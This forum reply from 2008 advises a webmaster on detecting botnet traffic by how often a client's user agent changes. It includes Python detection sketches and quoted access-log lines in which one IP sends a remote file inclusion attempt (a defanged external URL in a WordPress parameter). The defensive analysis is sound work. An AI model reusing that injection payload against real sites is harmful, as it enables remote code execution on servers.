05-12-2008, 05:43 PM
Tech Manager
Re: Deluge of the bots

Quote:
Originally Posted by wige
Yeah, that is what I am looking to do, but I need to grab the most suspect IP addresses from the database, and I am unsure what tolerances I should use.

Right now, the query SELECT IP, COUNT(DISTINCT useragent) AS Agents, COUNT(DISTINCT productID) as Products FROM pageviews GROUP BY IP ORDER BY Agents DESC; gives me the following table:

117.102.128.221 9 1
77.127.155.176 9 1
125.204.58.200 8 1
190.50.125.136 8 1
216.198.139.38 8 1
220.95.108.239 8 1
66.63.219.212 8 1
87.205.215.237 8 1
89.3.18.208 8 1
79.177.161.75 7 1
85.180.253.111 7 1

The first number is the number of unique user agents, and the second is the number of products they viewed. Note: it is not unusual for legitimate users to view the same product several times due to users re-viewing the page with AJAX.

Obviously, I think using nine different user agents to view a single product is highly suspect, but I am not sure where I should draw the line, and if there are other aspects I should be considering before deciding which IPs to block.

Let me give you an example of malicious activity from a likely botnet (most likely infected systems). The following log entries all come from a single IP address, yet they show multiple platforms and user agents. This particular bot is attempting to inject a malicious script into a WordPress site (I've added spaces so the malicious URL can't be clicked on):

80.230.118.211 - - [12/May/2008:06:39:29 -0500] "GET /?p=http:// ironmanshome . chat. ru/images? HTTP/1.0" 302 - "-" "Googlebot/2.1 (h t t p:// googlebot.com/bot. html)"
80.230.118.211 - - [12/May/2008:06:48:35 -0500] "GET /?p=http:// ironmanshome . chat. ru/images? HTTP/1.0" 302 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
80.230.118.211 - - [12/May/2008:06:53:47 -0500] "GET /?p=http:// ironmanshome . chat. ru/images? HTTP/1.0" 302 - "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows 95)"
80.230.118.211 - - [12/May/2008:06:58:42 -0500] "GET /?p=http:// ironmanshome . chat. ru/images? HTTP/1.0" 302 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90; H010818; AT&T CSM6.0)"
80.230.118.211 - - [12/May/2008:07:03:35 -0500] "GET /?p=http:// ironmanshome . chat. ru/images? HTTP/1.0" 302 - "-" "Mozilla/5.0 (compatible; Konqueror/3.0-rc1; i686 Linux; 20020527)"
80.230.118.211 - - [12/May/2008:07:10:53 -0500] "GET /?p=http:// ironmanshome . chat. ru/images? HTTP/1.0" 302 - "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows 9"
80.230.118.211 - - [12/May/2008:07:19:51 -0500] "GET /?p=http:// ironmanshome . chat. ru/images? HTTP/1.0" 302 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.2; pt-BR; rv:1.7.7) Gecko/20050414 Firefox/2.0.5"

This "bot" initially pretends to be Googlebot, but it quickly becomes apparent that it is not. It is evidently trying to bypass traditional filters that rely on fixed criteria. In this case it attempts to cloak its identity by changing the platform and user agent between requests. That in itself is a signature of undesirable traffic.
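
If you want to pull that signature straight out of the access logs rather than the database, something along these lines might work. It is only a rough sketch: it assumes the Apache combined log format shown above, the function names and the `max_agents` cutoff are my own inventions, and the sample lines use made-up documentation addresses rather than real traffic.

```python
import re
from collections import defaultdict

# Apache combined log format:
# IP identity user [time] "request" status size "referer" "user agent"
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

def agents_by_ip(lines):
    """Map each client IP to the set of user-agent strings it presented."""
    seen = defaultdict(set)
    for line in lines:
        match = LOG_LINE.match(line.strip())
        if match:  # lines that do not fit the format are skipped
            seen[match.group("ip")].add(match.group("agent"))
    return seen

def suspicious_ips(lines, max_agents=2):
    """Return IPs that presented more than max_agents distinct user agents."""
    return sorted(
        ip for ip, agents in agents_by_ip(lines).items()
        if len(agents) > max_agents
    )

# Made-up sample lines (hypothetical addresses and requests).
SAMPLE_LOG = [
    '192.0.2.10 - - [12/May/2008:06:39:29 -0500] "GET /?p=1 HTTP/1.0" 302 - "-" "Googlebot/2.1"',
    '192.0.2.10 - - [12/May/2008:06:48:35 -0500] "GET /?p=1 HTTP/1.0" 302 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"',
    '192.0.2.10 - - [12/May/2008:06:53:47 -0500] "GET /?p=1 HTTP/1.0" 302 - "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows 95)"',
    '198.51.100.7 - - [12/May/2008:07:01:02 -0500] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux i686)"',
]

print(suspicious_ips(SAMPLE_LOG))  # ['192.0.2.10']
```

Keep in mind that one IP can legitimately show a few different agents (an office behind NAT, for example), so the cutoff is a judgment call rather than a fixed rule.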

In the above case I am redirecting the traffic elsewhere based on several pieces of information: IP, platform, user agent and, of course, the obvious attempt to remotely inject a PHP script into the WordPress variables.
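
The injection attempt itself is easy to spot because a query parameter carries a full remote URL. Here is a minimal sketch of that one check, not my actual filter: the function name and the scheme list are assumptions for illustration, and a real setup would combine this with the IP and user-agent checks.

```python
from urllib.parse import urlsplit, parse_qsl

# Schemes treated as "remote" in this sketch (an assumption, adjust to taste).
REMOTE_SCHEMES = ("http://", "https://", "ftp://")

def has_remote_url_param(request_target):
    """Return True if any query parameter value starts with a remote URL.

    request_target is the path-plus-query part of the request line,
    e.g. "/?p=123". parse_qsl percent-decodes the values, so encoded
    URLs are caught as well.
    """
    query = urlsplit(request_target).query
    for _name, value in parse_qsl(query, keep_blank_values=True):
        if value.strip().lower().startswith(REMOTE_SCHEMES):
            return True
    return False

print(has_remote_url_param("/?p=http://example.invalid/images?"))  # True
print(has_remote_url_param("/?p=123"))                             # False
```

This will also trip on legitimate parameters that carry a URL (redirect targets, for instance), so treat a hit as one signal among several rather than proof.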

In your case I think it is best to contain the IP address if it shows more than two changes, counting changes of both platform and user agent. You could also add a time element and use it as the deciding factor alongside the first two.
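
To make the "more than two changes plus a time element" idea concrete, here is one way it could be sketched. The one-hour window, the names, and the sample events are all assumptions on my part; only the "more than two changes" cutoff comes from the suggestion above. It counts how often an IP switches user-agent string from one request to the next and flags the IP once more than `max_changes` switches fall inside the window.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

def parse_log_time(text):
    """Parse an Apache-style timestamp such as '12/May/2008:06:39:29 -0500'."""
    return datetime.strptime(text, "%d/%b/%Y:%H:%M:%S %z")

def ips_to_contain(events, max_changes=2, window=timedelta(hours=1)):
    """Flag IPs whose user agent changes more than max_changes times in window.

    events is an iterable of (ip, timestamp, user_agent) tuples.
    """
    change_times = defaultdict(deque)  # ip -> times of recent agent changes
    last_agent = {}
    flagged = set()
    for ip, when, agent in sorted(events, key=lambda e: e[1]):
        if ip in last_agent and agent != last_agent[ip]:
            change_times[ip].append(when)
        last_agent[ip] = agent
        changes = change_times[ip]
        # Forget changes that have fallen out of the time window.
        while changes and when - changes[0] > window:
            changes.popleft()
        if len(changes) > max_changes:
            flagged.add(ip)
    return flagged

# Made-up events (hypothetical addresses and shortened agent strings).
EVENTS = [
    ("192.0.2.10", parse_log_time("12/May/2008:06:39:29 -0500"), "Googlebot/2.1"),
    ("192.0.2.10", parse_log_time("12/May/2008:06:48:35 -0500"), "MSIE 6.0; Windows NT 5.0"),
    ("192.0.2.10", parse_log_time("12/May/2008:06:53:47 -0500"), "MSIE 4.01; Windows 95"),
    ("192.0.2.10", parse_log_time("12/May/2008:06:58:42 -0500"), "Konqueror/3.0-rc1; Linux"),
    ("198.51.100.7", parse_log_time("12/May/2008:07:00:00 -0500"), "Firefox/2.0"),
    ("198.51.100.7", parse_log_time("12/May/2008:07:30:00 -0500"), "MSIE 6.0; Windows NT 5.1"),
]

print(ips_to_contain(EVENTS))  # {'192.0.2.10'}
```

A shorter window makes the rule stricter about how fast the changes must happen: with `window=timedelta(minutes=5)` the same sample flags nothing, because no three changes land within five minutes of each other.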
__________________
I use Country IP Blocks as added security for my networks and servers.

Last edited by Tech Manager; 05-12-2008 at 05:57 PM.